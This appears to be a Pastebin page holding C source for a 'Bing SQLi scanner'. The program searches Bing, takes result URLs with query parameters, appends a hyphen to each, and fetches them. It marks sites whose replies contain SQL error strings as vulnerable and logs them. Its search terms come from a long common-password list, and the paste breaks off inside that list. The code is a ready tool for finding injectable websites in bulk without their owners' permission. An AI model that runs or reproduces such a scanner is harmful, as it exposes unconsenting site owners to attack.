Don't like ads? PRO users don't see any ads ;-)
Guest

buz bing sqli scanner

By: a guest on Jun 25th, 2012  |  syntax: C  |  size: 81.68 KB  |  hits: 111  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. // wininet-test.cpp : Defines the entry point for the console application.
  2. //
  3.  
  4. #include "stdafx.h"
  5. #include <windows.h>
  6. #include <wininet.h>
  7. #include <stdio.h>
  8. #include <stdlib.h>
  9. #include <string>
  10. #include <windef.h>
  11. #include <time.h>
  12. #pragma comment(lib, "wininet.lib")
  13. int error_check(char *host, char *object, char *html_reada)
  14. {
  15.                                                         /* SQL Errors */
  16.                         char sql_error_a[] = "Division by zero in";
  17.                         char sql_error_b[] = "supplied argument is not a valid MySQL result resource in";
  18.                         char sql_error_c[] = "Call to a member function";
  19.                         char sql_error_d[] = "Microsoft JET Database";
  20.                         char sql_error_e[] = "ODBC Microsoft Access Driver";
  21.                         char sql_error_f[] = "Microsoft OLE DB Provider for SQL Server";
  22.                         char sql_error_g[] = "Unclosed quotation mark";
  23.                         char sql_error_h[] = "Microsoft OLE DB Provider for Oracle";
  24.                         char sql_error_i[] = "Incorrect syntax near";
  25.                         char sql_error_j[] = "SQL query failed";
  26.                        
  27.  
  28.                                                                                 /* Check SQL Errors */
  29.                                                 if    (strstr(html_reada, sql_error_a)  || strstr(html_reada, sql_error_b) || strstr(html_reada, sql_error_c)
  30.                                                 || strstr(html_reada, sql_error_d)  || strstr(html_reada, sql_error_e) || strstr(html_reada, sql_error_f)
  31.                                                 || strstr(html_reada, sql_error_g)  || strstr(html_reada, sql_error_h) || strstr(html_reada, sql_error_i)
  32.                                                 || strstr(html_reada, sql_error_j))
  33.                                                         {
  34.                                                                 char full_url[1024];
  35.                                                                 sprintf_s(full_url, 1024, "%s%s-", host, object);
  36.                                                
  37.                                                                                                    /* SQLi Result */
  38.                                                         printf("[+] SQLi Vuln: %s\n", full_url);
  39.                                                         FILE *f;
  40.                                                         f = fopen("sqli_ouput.txt","a+");
  41.                                                         fprintf(f, "%s\n", full_url);
  42.                                                         fclose(f);
  43.                                                        
  44.                                                         }
  45.                                 return 0;
  46. }
  47. int connect_sqli_url(char *host, char *object)
  48. {
  49.  
  50.  
  51. char search_engine[] = "www.bing.com";
  52.         LPCTSTR lpszAgent = "WinInetGet/0.1";
  53.         HINTERNET hInternet = InternetOpen(lpszAgent, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
  54.         LPCTSTR lpszServerName = host;
  55.         INTERNET_PORT nServerPort = INTERNET_DEFAULT_HTTP_PORT;
  56.         LPCTSTR lpszUserName = NULL;
  57.         LPCTSTR lpszPassword = NULL;
  58.         DWORD dwConnectFlags = 0;
  59.         DWORD dwConnectContext = 0;
  60.  
  61.                         HINTERNET hConnect = InternetConnect(hInternet,lpszServerName, nServerPort,lpszUserName, lpszPassword, INTERNET_SERVICE_HTTP, dwConnectFlags, dwConnectContext);
  62.  
  63.                         LPCTSTR lpszVerb = "GET";
  64.                         char hyphon_object[1024];
  65.                         sprintf_s(hyphon_object, 1024, "%s-", object);
  66.                         LPCTSTR lpszObjectName = hyphon_object;
  67.                         //printf("[+] host: %s\n[+] object: %s\n\n", host, hyphon_object);
  68.                         //printf("[+] %s",lpszObjectName  );
  69.                         LPCTSTR lpszVersion = NULL;// Use default.
  70.                         LPCTSTR lpszReferrer = NULL;// No referrer.
  71.                         LPCTSTR *lplpszAcceptTypes = NULL;// Whatever the server wants to give us.
  72.                         DWORD dwOpenRequestFlags =INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP |INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS |INTERNET_FLAG_KEEP_CONNECTION |
  73.                         INTERNET_FLAG_NO_AUTH |INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_COOKIES |INTERNET_FLAG_NO_UI |INTERNET_FLAG_RELOAD;
  74.  
  75.                         DWORD dwOpenRequestContext = 0;
  76.                         HINTERNET hRequest = HttpOpenRequest(hConnect, lpszVerb, lpszObjectName, lpszVersion, lpszReferrer, lplpszAcceptTypes, dwOpenRequestFlags, dwOpenRequestContext);
  77.  
  78.                         BOOL bResult = HttpSendRequest(hRequest, NULL, 0, NULL, 0);
  79.                         DWORD dwInfoLevel = HTTP_QUERY_RAW_HEADERS_CRLF;
  80.                         DWORD dwInfoBufferLength = 10;
  81.                         BYTE *pInfoBuffer = (BYTE *)malloc(dwInfoBufferLength+1);
  82.  
  83.                         while (!HttpQueryInfo(hRequest, dwInfoLevel, pInfoBuffer, &dwInfoBufferLength, NULL))
  84.                         {
  85.                                 DWORD dwError = GetLastError();
  86.                                 if (dwError == ERROR_INSUFFICIENT_BUFFER)
  87.                                 {
  88.                                         free(pInfoBuffer);
  89.                                         pInfoBuffer = (BYTE *)malloc(dwInfoBufferLength+1);
  90.                                 }
  91.                         }
  92.                         pInfoBuffer[dwInfoBufferLength] = '\0';
  93.                         free(pInfoBuffer);
  94.  
  95.                         DWORD dwBytesAvailable;
  96.  
  97.                         while (InternetQueryDataAvailable(hRequest, &dwBytesAvailable, 0, 0))
  98.                         {
  99.                                 char *pMessageBody = (char *)malloc(dwBytesAvailable+1);
  100.                                 DWORD dwBytesRead;
  101.                                 BOOL bResult = InternetReadFile(hRequest, pMessageBody, dwBytesAvailable, &dwBytesRead);
  102.                                 if (dwBytesRead == 0)
  103.                                 break;// End of File.
  104.                                 pMessageBody[dwBytesRead] = '\0';
  105.                                 char *html_reada = pMessageBody;
  106.                                 //printf("[+] html_read: %s", html_reada);
  107.                                 error_check(host, object, html_reada);
  108.                         }
  109.  
  110.  
  111.         return 0;
  112. }
  113. //////////////////////////////////////////////////////
  114. int connect_vuln(char *new_sql_url){
  115.     char *left;
  116.         char *right;
  117.         left = strdup(new_sql_url);         // first make a copy
  118.         char* leftEnd = strstr(left, "/"); right = strdup(leftEnd); *leftEnd = '\0';
  119.         //printf("[+] host: %s\n[+] object: %s\n\n", left, right); // print the results
  120.         char *host = left;
  121.         char *object = right;
  122.         connect_sqli_url(host, object);
  123.         free(left);
  124.         return 0;
  125. }
  126. int connect_url(char *sql_url){
  127.         //getchar();
  128.         char *Left;
  129.         char *Right;
  130.         char *first;
  131.         char *second;
  132.  
  133.        
  134.         first = strdup(sql_url);         // first make a copy
  135.         second = strstr(first,"/");      // second locate the desired text
  136.     *(second -1) = '\0';            // third split the string
  137.         //printf("Original : %s\nLeft side: %s\nRight side: %s\n\n",sql_url,first,second+2); // print the results
  138.         char *new_sql_url = second +2;
  139.         if(new_sql_url[0] != 'w' && new_sql_url[1] != 'w'&& new_sql_url[2] != 'w')
  140.         {
  141.                 char added_www[1024];
  142.             sprintf_s(added_www, 1024, "www.%s", new_sql_url );
  143.                 new_sql_url = added_www;
  144.                 //printf("[w] new_url: %s\n", new_sql_url);
  145.                 connect_vuln(new_sql_url);
  146.         }
  147.         else
  148.         //printf("[+] new_url: %s\n", new_sql_url);
  149.         connect_vuln(new_sql_url);
  150.  
  151.         free(first);
  152.         return 0;
  153. }
  154. DWORD filter_urls(char *html_read){
  155.         //printf("[+] filter loops func\n");
  156.         for(int a=0; html_read; a++)
  157.         {
  158.                 html_read = strstr (html_read, "href=\"");
  159.                 if(html_read)
  160.                 {
  161.                         html_read += strlen("href=\"");
  162.                         char *tmp = strstr(html_read,"\"");
  163.                         if(tmp) tmp[0] = 0;
  164.  
  165.                         if (strstr(html_read,".aspx?") || strstr(html_read,".asp?") || strstr(html_read,".cfm?") || strstr(html_read,".php?"))
  166.                         {
  167.                                 if (!strstr(html_read,"bing") || !strstr(html_read,".gov") || !strstr(html_read,".mil") || !strstr(html_read,"google"))
  168.                                         {
  169.                                         if(html_read[0] == 'h' && html_read[4] != 's')
  170.                                         {
  171.                                                         char *sql_url = html_read;
  172.                                                         //printf("[+] trying: %s \n", sql_url);
  173.                                                         connect_url(sql_url);
  174.                                         }
  175.                                         html_read += strlen(html_read)+2;
  176.                                         }
  177.                         }
  178.         } // if(html_read) bracket
  179.         }  // for html_read bracket
  180.         return 0;      
  181. }
  182. ///////////////////////////////////////////////////////
  183. int connect_bing(char *bing_url){
  184.        
  185.                         char search_engine[] = "www.bing.com";
  186.                         LPCTSTR lpszAgent = "WinInetGet/0.1";
  187.                         HINTERNET hInternet = InternetOpen(lpszAgent, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
  188.                         LPCTSTR lpszServerName = search_engine;
  189.                         INTERNET_PORT nServerPort = INTERNET_DEFAULT_HTTP_PORT;
  190.                         LPCTSTR lpszUserName = NULL;
  191.                         LPCTSTR lpszPassword = NULL;
  192.                         DWORD dwConnectFlags = 0;
  193.                         DWORD dwConnectContext = 0;
  194.                         HINTERNET hConnect = InternetConnect(hInternet,lpszServerName, nServerPort,lpszUserName, lpszPassword, INTERNET_SERVICE_HTTP, dwConnectFlags, dwConnectContext);
  195.                         LPCTSTR lpszVerb = "GET";
  196.                         LPCTSTR lpszObjectName = bing_url;
  197.                         //printf("[+] %s",lpszObjectName  );
  198.                         LPCTSTR lpszVersion = NULL;// Use default.
  199.                         LPCTSTR lpszReferrer = NULL;// No referrer.
  200.                         LPCTSTR *lplpszAcceptTypes = NULL;// Whatever the server wants to give us.
  201.                         DWORD dwOpenRequestFlags =INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP |INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS |INTERNET_FLAG_KEEP_CONNECTION |
  202.                         INTERNET_FLAG_NO_AUTH |INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_COOKIES |INTERNET_FLAG_NO_UI |INTERNET_FLAG_RELOAD;
  203.                         DWORD dwOpenRequestContext = 0;
  204.                         HINTERNET hRequest = HttpOpenRequest(hConnect, lpszVerb, lpszObjectName, lpszVersion, lpszReferrer, lplpszAcceptTypes, dwOpenRequestFlags, dwOpenRequestContext);
  205.                         BOOL bResult = HttpSendRequest(hRequest, NULL, 0, NULL, 0);
  206.                         DWORD dwInfoLevel = HTTP_QUERY_RAW_HEADERS_CRLF;
  207.                         DWORD dwInfoBufferLength = 10;
  208.                         BYTE *pInfoBuffer = (BYTE *)malloc(dwInfoBufferLength+1);
  209.                         while (!HttpQueryInfo(hRequest, dwInfoLevel, pInfoBuffer, &dwInfoBufferLength, NULL))
  210.                         {
  211.                                 DWORD dwError = GetLastError();
  212.                                 if (dwError == ERROR_INSUFFICIENT_BUFFER)
  213.                                 {
  214.                                         free(pInfoBuffer);
  215.                                         pInfoBuffer = (BYTE *)malloc(dwInfoBufferLength+1);
  216.                                 }
  217.                         }
  218.                         pInfoBuffer[dwInfoBufferLength] = '\0';
  219.                         free(pInfoBuffer);
  220.                         DWORD dwBytesAvailable;
  221.                         while (InternetQueryDataAvailable(hRequest, &dwBytesAvailable, 0, 0))
  222.                         {
  223.                                 char *pMessageBody = (char *)malloc(dwBytesAvailable+1);
  224.                                 DWORD dwBytesRead;
  225.                                 BOOL bResult = InternetReadFile(hRequest, pMessageBody, dwBytesAvailable, &dwBytesRead);
  226.                                 if (dwBytesRead == 0)
  227.                                 break;// End of File.
  228.                                 pMessageBody[dwBytesRead] = '\0';
  229.                                 char *html_read = pMessageBody;
  230.                                 //printf("[+] html_read: %s", html_read);
  231.                                 CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&filter_urls, (LPVOID) strdup(html_read), 0, NULL );
  232.                         }
  233.                         return 0;
  234.                 }
  235. //////////////////////////////////////////////////////
  236. int create_bing_url(){
  237.         srand(time(NULL));
  238.         while(1)
  239.         {
  240.         char *page_name[]={
  241. "123456", "12345", "password", "password1", "123456789", "12345678", "1234567890", "abc123", "computer",
  242.  "tigger", "1234", "qwerty", "money", "carmen", "mickey", "secret", "summer", "internet", "a1b2c3", "123",
  243.  "service", "canada", "hello", "ranger", "shadow", "baseball", "donald", "harley", "hockey", "letmein", "maggie",
  244.  "mike", "mustang", "snoopy", "buster", "dragon", "jordan", "michael", "michelle", "mindy", "patrick", "123abc",
  245.  "andrew", "bear", "calvin", "changeme", "diamond", "fuckme", "fuckyou", "matthew", "miller", "tiger", "trustno1",
  246.  "alex", "apple", "avalon", "brandy", "chelsea", "coffee", "falcon", "freedom", "gandalf", "green", "helpme",
  247.  "linda", "magic", "merlin", "newyork", "soccer", "thomas", "wizard", "asdfgh", "bandit", "batman", "boris",
  248.  "butthead", "dorothy", "eeyore", "fishing", "football", "george", "happy", "iloveyou", "jennifer", "jonathan",
  249.  "love", "marina", "master", "missy", "monday", "monkey", "natasha", "ncc1701", "pamela", "pepper", "piglet",
  250.  "poohbear", "pookie", "rabbit", "rachel", "rocket", "rose", "smile", "sparky", "spring", "steven", "success",
  251.  "sunshine", "victoria", "whatever", "zapata", "8675309", "amanda", "andy", "angel", "august", "barney", "biteme",
  252.  "boomer", "brian", "casey", "cowboy", "delta", "doctor", "fisher", "island", "john", "joshua", "karen", "marley",
  253.  "orange", "please", "rascal", "richard", "sarah", "scooter", "shalom", "silver", "skippy", "stanley", "taylor",
  254.  "welcome", "zephyr", "111111", "aaaaaa", "access", "albert", "alexander", "andrea", "anna", "anthony", "asdfjkl",
  255.  "ashley", "basketball", "beavis", "black", "bob", "booboo", "bradley", "brandon", "buddy", "caitlin", "camaro",
  256.  "charlie", "chicken", "chris", "cindy", "cricket", "dakota", "dallas", "daniel", "david", "debbie", "dolphin",
  257.  "elephant", "emily", "friend", "fucker", "ginger", "goodluck", "hammer", "heather", "iceman", "jason", "jessica",
  258.  "jesus", "joseph", "jupiter", "justin", "kevin", "knight", "lacrosse", "lakers", "lizard", "madison", "mary",
  259.  "mother", "muffin", "murphy", "nirvana", "paris", "pentium", "phoenix", "picture", "rainbow", "sandy", "saturn",
  260.  "scott", "shannon", "shithead", "skeeter", "sophie", "special", "stephanie", "stephen", "steve", "sweetie",
  261.  "teacher", "tennis", "test", "test123", "tommy", "topgun", "tristan", "wally", "william", "wilson", "1q2w3e",
  262.  "654321", "666666", "a12345", "a1b2c3d4", "alpha", "amber", "angela", "angie", "archie", "asdf", "blazer",
  263.  "bond007", "booger", "charles", "christin", "claire", "control", "danny", "david1", "dennis", "digital",
  264.  "disney", "edward", "elvis", "felix", "flipper", "franklin", "frodo", "honda", "horses", "hunter", "indigo",
  265.  "james", "jasper", "jeremy", "julian", "kelsey", "killer", "lauren", "marie", "maryjane", "matrix", "maverick",
  266.  "mayday", "mercury", "mitchell", "morgan", "mountain", "niners", "nothing", "oliver", "peace", "peanut", "pearljam",
  267.  "phantom", "popcorn", "princess", "psycho", "pumpkin", "purple", "randy", "rebecca", "reddog", "robert", "rocky",
  268.  "roses", "salmon", "samson", "sharon", "sierra", "smokey", "startrek", "steelers", "stimpy", "sunflower", "superman",
  269.  "support", "sydney", "techno", "walter", "willie", "willow", "winner", "ziggy", "zxcvbnm", "alaska", "alexis", "alice",
  270.  "animal", "apples", "barbara", "benjamin", "billy", "blue", "bluebird", "bobby", "bonnie", "bubba", "camera", "chocolate",
  271.  "clark", "claudia", "cocacola", "compton", "connect", "cookie", "cruise", "douglas", "dreamer", "dreams", "duckie",
  272.  "eagles", "eddie", "einstein", "enter", "explorer", "faith", "family", "ferrari", "flamingo", "flower", "foxtrot",
  273.  "francis", "freddy", "friday", "froggy", "giants", "gizmo", "global", "goofy", "happy1", "hendrix", "henry", "herman",
  274.  "homer", "honey", "house", "houston", "iguana", "indiana", "insane", "inside", "irish", "ironman", "jake", "jasmin",
  275.  "jeanne", "jerry", "joey", "justice", "katherine", "kermit", "kitty", "koala", "larry", "leslie", "logan", "lucky",
  276.  "mark", "martin", "matt", "minnie", "misty", "mitch", "mouse", "nancy", "nascar", "nelson", "pantera", "parker",
  277.  "penguin", "peter", "piano", "pizza", "prince", "punkin", "pyramid", "raymond", "robin", "roger", "rosebud",
  278.  "route66", "royal", "running", "sadie", "sasha", "security", "sheena", "sheila", "skiing", "snapple", "snowball",
  279.  "sparrow", "spencer", "spike", "star", "stealth", "student", "sunny", "sylvia", "tamara", "taurus", "teresa",
  280.  "theresa", "thunderbird", "tigers", "tony", "toyota", "travel", "tuesday", "victory", "viper1", "wesley", "whisky",
  281.  "winnie", "winter", "wolves", "xyz123", "zorro", "123123", "1234567", "696969", "888888", "Anthony", "Joshua", "Matthew",
  282.  "Tigger", "aaron", "abby", "abcdef", "adidas", "adrian", "alfred", "arthur", "athena", "austin", "awesome", "badger",
  283.  "bamboo", "beagle", "bears", "beatles", "beautiful", "beaver", "benny", "bigmac", "bingo", "bitch", "blonde", "boogie",
  284.  "boston", "brenda", "bright", "bubba1", "bubbles", "buffy", "button", "buttons", "cactus", "candy", "captain", "carlos",
  285.  "caroline", "carrie", "casper", "catch22", "chance", "charity", "charlotte", "cheese", "cheryl", "chloe", "chris1", "clancy",
  286.  "compaq", "conrad", "cooper", "cooter", "copper", "cosmos", "cougar", "cracker", "crawford", "crystal", "curtis", "cyclone",
  287.  "dance", "diablo", "dollars", "dookie", "dumbass", "dundee", "elizabeth", "eric", "europe", "farmer", "firebird", "fletcher",
  288.  "fluffy", "france", "freak1", "friends", "fuckoff", "gabriel", "galaxy", "gambit", "garden", "garfield", "garnet", "genesis",
  289.  "genius", "godzilla", "golfer", "goober", "grace", "greenday", "groovy", "grover", "guitar", "hacker", "harry", "hazel", "hector",
  290.  "herbert", "horizon", "hornet", "howard", "icecream", "imagine", "impala", "jack", "janice", "jasmine", "jason1", "jeanette",
  291.  "jeffrey", "jenifer", "jenni", "jesus1", "jewels", "joker", "julie", "julie1", "junior", "justin1", "kathleen", "keith", "kelly",
  292.  "kelly1", "kennedy", "kevin1", "knicks", "larry1", "leonard", "lestat", "library", "lincoln", "lionking", "london", "louise",
  293.  "lucky1", "lucy", "maddog", "margaret", "mariposa", "marlboro", "martin1", "marty", "master1", "mensuck", "mercedes", "metal",
  294.  "midori", "mikey", "millie", "mirage", "molly", "monet", "money1", "monica", "monopoly", "mookie", "moose", "moroni", "music",
  295.  "naomi", "nathan", "nguyen", "nicholas", "nicole", "nimrod", "october", "olive", "olivia", "online", "oscar", "oxford", "pacific",
  296.  "painter", "peaches", "penelope", "pepsi", "petunia", "philip", "phoenix1", "photo", "pickle", "player", "poiuyt", "porsche",
  297.  "porter", "puppy", "python", "quality", "raquel", "raven", "remember", "robbie", "robert1", "roman", "rugby", "runner", "russell",
  298.  "ryan", "sailing", "sailor", "samantha", "savage", "scarlett", "school", "sean", "seven", "shadow1", "sheba", "shelby", "shit",
  299.  "shoes", "simba", "simple", "skipper", "smiley", "snake", "snickers", "sniper", "snoopdog", "snowman", "sonic", "spitfire",
  300.  "sprite", "spunky", "starwars", "station", "stella", "stingray", "storm", "stormy", "stupid", "sunny1", "sunrise", "surfer",
  301.  "susan", "tammy", "tango", "tanya", "teddy1", "theboss", "theking", "thumper", "tina", "tintin", "tomcat", "trebor", "trevor",
  302.  "tweety", "unicorn", "valentine", "valerie", "vanilla", "veronica", "victor", "vincent", "viper", "warrior", "warriors",
  303.  "weasel", "wheels", "wilbur", "winston", "wisdom", "wombat", "xavier", "yellow", "zeppelin", "1111", "1212", "Andrew",
  304.  "Family", "Friends", "Michael", "Michelle", "Snoopy", "abcd1234", "abcdefg", "abigail", "account", "adam", "alex1", "alice1",
  305.  "allison", "alpine", "andre1", "andrea1", "angel1", "anita", "annette", "antares", "apache", "apollo", "aragorn", "arizona", "arnold",
  306.  "arsenal", "asdfasdf", "asdfg", "asdfghjk", "avenger", "baby", "babydoll", "bailey", "banana", "barry", "basket", "batman1", "beaner",
  307.  "beast", "beatrice", "bella", "bertha", "bigben", "bigdog", "biggles", "bigman", "binky", "biology", "bishop", "blondie", "bluefish",
  308.  "bobcat", "bosco", "braves", "brazil", "bruce", "bruno", "brutus", "buffalo", "bulldog", "bullet", "bullshit", "bunny", "business",
  309.  "butch", "butler", "butter", "california", "carebear", "carol", "carol1", "carole", "cassie", "castle", "catalina", "catherine",
  310.  "cccccc", "celine", "center", "champion", "chanel", "chaos", "chelsea1", "chester1", "chicago", "chico", "christian", "christy",
  311.  "church", "cinder", "colleen", "colorado", "columbia", "commander", "connie", "cookies", "cooking", "corona", "cowboys", "coyote",
  312.  "craig", "creative", "cuddles", "cuervo", "cutie", "daddy", "daisy", "daniel1", "danielle", "davids", "death", "denis", "derek",
  313.  "design", "destiny", "diana", "diane", "dickhead", "digger", "dodger", "donna", "dougie", "dragonfly", "dylan", "eagle", "eclipse",
  314.  "electric", "emerald", "etoile", "excalibur", "express", "fender", "fiona", "fireman", "flash", "florida", "flowers", "foster",
  315.  "francesco", "francine", "francois", "frank", "french", "fuckface", "gemini", "general", "gerald", "germany", "gilbert", "goaway",
  316.  "golden", "goldfish", "goose", "gordon", "graham", "grant", "gregory", "gretchen", "gunner", "hannah", "harold", "harrison", "harvey",
  317.  "hawkeye", "heaven", "heidi", "helen", "helena", "hithere", "hobbit", "ibanez", "idontknow", "integra", "ireland", "irene", "isaac",
  318.  "isabel", "jackass", "jackie", "jackson", "jaguar", "jamaica", "japan", "jenny1", "jessie", "johan", "johnny", "joker1", "jordan23",
  319.  "judith", "julia", "jumanji", "kangaroo", "karen1", "kathy", "keepout", "keith1", "kenneth", "kimberly", "kingdom", "kitkat", "kramer",
  320.  "kristen", "laura", "laurie", "lawrence", "lawyer", "legend", "liberty", "light", "lindsay", "lindsey", "lisa", "liverpool", "lola",
  321.  "lonely", "louis", "lovely", "loveme", "lucas", "madonna", "malcolm", "malibu", "marathon", "marcel", "maria1", "mariah", "mariah1",
  322.  "marilyn", "mario", "marvin", "maurice", "maxine", "maxwell", "me", "meggie", "melanie", "melissa", "melody", "mexico", "michael1",
  323.  "michele", "midnight", "mike1", "miracle", "misha", "mishka", "molly1", "monique", "montreal", "moocow", "moore", "morris", "mouse1",
  324.  "mulder", "nautica", "nellie", "newton", "nick", "nirvana1", "nissan", "norman", "notebook", "ocean", "olivier", "ollie", "oranges",
  325.  "oregon", "orion", "panda", "pandora", "panther", "passion", "patricia", "pearl", "peewee", "pencil", "penny", "people", "percy",
  326.  "person", "peter1", "petey", "picasso", "pierre", "pinkfloyd", "polaris", "police", "pookie1", "poppy", "power", "predator", "preston",
  327.  "q1w2e3", "queen", "queenie", "quentin", "ralph", "random", "rangers", "raptor", "reality", "redrum", "remote", "reynolds", "rhonda",
  328.  "ricardo", "ricardo1", "ricky", "river", "roadrunner", "robinhood", "rocknroll", "rocky1", "ronald", "roxy", "ruthie", "sabrina",
  329.  "sakura", "sally", "sampson", "samuel", "sandra", "santa", "sapphire", "scarlet", "scorpio", "scott1", "scottie", "scruffy", "seattle",
  330.  "serena", "shanti", "shark", "shogun", "simon", "singer", "skull", "skywalker", "slacker", "smashing", "smiles", "snowflake", "snuffy",
  331.  "soccer1", "soleil", "sonny", "spanky", "speedy", "spider", "spooky", "stacey", "star69", "start", "steven1", "stinky", "strawberry",
  332.  "stuart", "sugar", "sundance", "superfly", "suzanne", "suzuki", "swimmer", "swimming", "system", "taffy", "tarzan", "teddy",
  333.  "teddybear", "terry", "theatre", "thunder", "thursday", "tinker", "tootsie", "tornado", "tracy", "tricia", "trident", "trojan",
  334.  "truman", "trumpet", "tucker", "turtle", "tyler", "utopia", "voyager", "warcraft", "warlock", "warren", "water", "wayne",
  335.  "wendy", "williams", "willy", "winona", "woody", "woofwoof", "wrangler", "wright", "xfiles", "xxxxxx", "yankees", "yvonne",
  336.  "zebra", "zenith", "zigzag", "zombie", "zxc123", "zxcvb", "000000", "007007", "11111", "11111111", "123321", "171717", "181818",
  337.  "1a2b3c", "1chris", "4runner", "54321", "55555", "6969", "7777777", "789456", "88888888", "Alexis", "Bailey", "Charlie", "Chris",
  338.  "Daniel", "Dragon", "Elizabeth", "HARLEY", "Heather", "Jennifer", "Jessica", "Jordan", "KILLER", "Nicholas", "Password", "Princess",
  339.  "Purple", "Rebecca", "Robert", "Shadow", "Steven", "Summer", "Sunshine", "Superman", "Taylor", "Thomas", "Victoria", "abcd123", "abcde",
  340.  "accord", "active", "africa", "airborne", "alfaro", "alicia", "aliens", "alina", "aline", "alison", "allen", "aloha", "alpha1", "althea",
  341.  "altima", "amanda1", "amazing", "america", "amour", "anderson", "andre", "andrew1", "andromeda", "angels", "angie1", "annie", "anything",
  342.  "apple1", "apple2", "applepie", "april", "aquarius", "ariane", "ariel", "arlene", "artemis", "asdf1234", "asdfjkl", "ashley1", "ashraf",
  343.  "ashton", "asterix", "attila", "autumn", "avatar", "babes", "bambi", "barbie", "barney1", "barrett", "bball", "beaches", "beanie", "beans",
  344.  "beauty", "becca", "belize", "belle", "belmont", "benji", "benson", "bernardo", "berry", "betsy", "betty", "bigboss", "bigred", "billy1",
  345.  "birdie", "birthday", "biscuit", "bitter", "blackjack", "blah", "blanche", "blood", "blowjob", "blowme", "blueeyes", "blues", "bogart",
  346.  "bombay", "boobie", "boots", "bootsie", "boxers", "brandi", "brent", "brewster", "bridge", "bronco", "bronte", "brooke", "brother", "bryan",
  347.  "bubble", "buddha", "budgie", "burton", "butterfly", "byron", "calendar", "calvin1", "camel", "camille", "campbell", "camping", "cancer",
  348.  "canela", "cannon", "carbon", "carnage", "carolyn", "carrot", "cascade", "catfish", "cathy", "catwoman", "cecile", "celica", "change",
  349.  "chantal", "charger", "cherry", "chiara", "chiefs", "china", "chris123", "christ1", "christmas", "christopher", "chuck", "cindy1",
  350.  "cinema", "civic", "claude", "clueless", "cobain", "cobra", "cody", "colette", "college", "colors", "colt45", "confused", "cool",
  351.  "corvette", "cosmo", "country", "crusader", "cunningham", "cupcake", "cynthia", "dagger", "dammit", "dancer", "daphne", "darkstar",
  352.  "darren", "darryl", "darwin", "deborah", "december", "deedee", "deeznuts", "delano", "delete", "demon", "denise", "denny", "desert",
  353.  "deskjet", "detroit", "devil", "devine", "devon", "dexter", "dianne", "diesel", "director", "dixie", "dodgers", "doggy", "dollar",
  354.  "dolly", "dominique", "domino", "dontknow", "doogie", "doudou", "downtown", "dragon1", "driver", "dude", "dudley", "dutchess", "dwight",
  355.  "eagle1", "easter", "eastern", "edith", "edmund", "eight", "element", "elissa", "ellen", "elliot", "empire", "enigma", "enterprise",
  356.  "erin", "escort", "estelle", "eugene", "evelyn", "explore", "family1", "fatboy", "felipe", "ferguson", "ferret", "ferris", "fireball",
  357.  "fishes", "fishie", "flight", "florida1", "flowerpot", "forward", "freddie", "freebird", "freeman", "frisco", "fritz", "froggie",
  358.  "froggies", "frogs", "fucku", "future", "gabby", "games", "garcia", "gaston", "gateway", "george1", "georgia", "german", "germany1",
  359.  "getout", "ghost", "gibson", "giselle", "gmoney", "goblin", "goblue", "gollum", "grandma", "gremlin", "grizzly", "grumpy", "guess",
  360.  "guitar1", "gustavo", "haggis", "haha", "hailey", "halloween", "hamilton", "hamlet", "hanna", "hanson", "happy123", "happyday",
  361.  "hardcore", "harley1", "harriet", "harris", "harvard", "health", "heart", "heather1", "heather2", "hedgehog", "helene", "hello1",
  362.  "hello123", "hellohello", "hermes", "heythere", "highland", "hilda", "hillary", "history", "hitler", "hobbes", "holiday", "holly",
  363.  "honda1", "hongkong", "hootie", "horse", "hotrod", "hudson", "hummer", "huskies", "idiot", "iforget", "iloveu", "impact", "indonesia",
  364.  "irina", "isabelle", "israel", "italia", "italy", "jackie1", "jacob", "jakey", "james1", "jamesbond", "jamie", "jamjam", "jeffrey1",
  365.  "jennie", "jenny", "jensen", "jesse", "jesse1", "jester", "jethro", "jimbob", "jimmy", "joanna", "joelle", "john316", "jordie",
  366.  "jorge", "josh", "journey", "joyce", "jubilee", "jules", "julien", "juliet", "junebug", "juniper", "justdoit", "karin", "karine",
  367.  "karma", "katerina", "katie", "katie1", "kayla", "keeper", "keller", "kendall", "kenny", "ketchup", "kings", "kissme", "kitten",
  368.  "kittycat", "kkkkkk", "kristi", "kristine", "labtec", "laddie", "ladybug", "lance", "laurel", "lawson", "leader", "leland", "lemon",
  369.  "lester", "letter", "letters", "lexus1", "libra", "lights", "lionel", "little", "lizzy", "lolita", "lonestar", "longhorn", "looney",
  370.  "loren", "lorna", "loser", "lovers", "loveyou", "lucia", "lucifer", "lucky14", "maddie", "madmax", "magic1", "magnum", "maiden",
  371.  "maine", "management", "manson", "manuel", "marcus", "maria", "marielle", "marine", "marino", "marshall", "martha", "maxmax",
  372.  "meatloaf", "medical", "megan", "melina", "memphis", "mermaid", "miami", "michel", "michigan", "mickey1", "microsoft", "mikael",
  373.  "milano", "miles", "millenium", "million", "miranda", "miriam", "mission", "mmmmmm", "mobile", "monkey1", "monroe", "montana",
  374.  "monty", "moomoo", "moonbeam", "morpheus", "motorola", "movies", "mozart", "munchkin", "murray", "mustang1", "nadia", "nadine",
  375.  "napoleon", "nation", "national", "nestle", "newlife", "newyork1", "nichole", "nikita", "nikki", "nintendo", "nokia", "nomore",
  376.  "normal", "norton", "noway", "nugget", "number9", "numbers", "nurse", "nutmeg", "ohshit", "oicu812", "omega", "openup", "orchid",
  377.  "oreo", "orlando", "packard", "packers", "paloma", "pancake", "panic", "parola", "parrot", "partner", "pascal", "patches", "patriots",
  378.  "paula", "pauline", "payton", "peach", "peanuts", "pedro1", "peggy", "perfect", "perry", "peterpan", "philips", "phillips", "phone",
  379.  "pierce", "pigeon", "pink", "pioneer", "piper1", "pirate", "pisces", "playboy", "pluto", "poetry", "pontiac", "pookey", "popeye",
  380.  "prayer", "precious", "prelude", "premier", "puddin", "pulsar", "pussy", "pussy1", "qwert", "qwerty12", "qwertyui", "rabbit1",
  381.  "rachelle", "racoon", "rambo", "randy1", "ravens", "redman", "redskins", "reggae", "reggie", "renee", "renegade", "rescue",
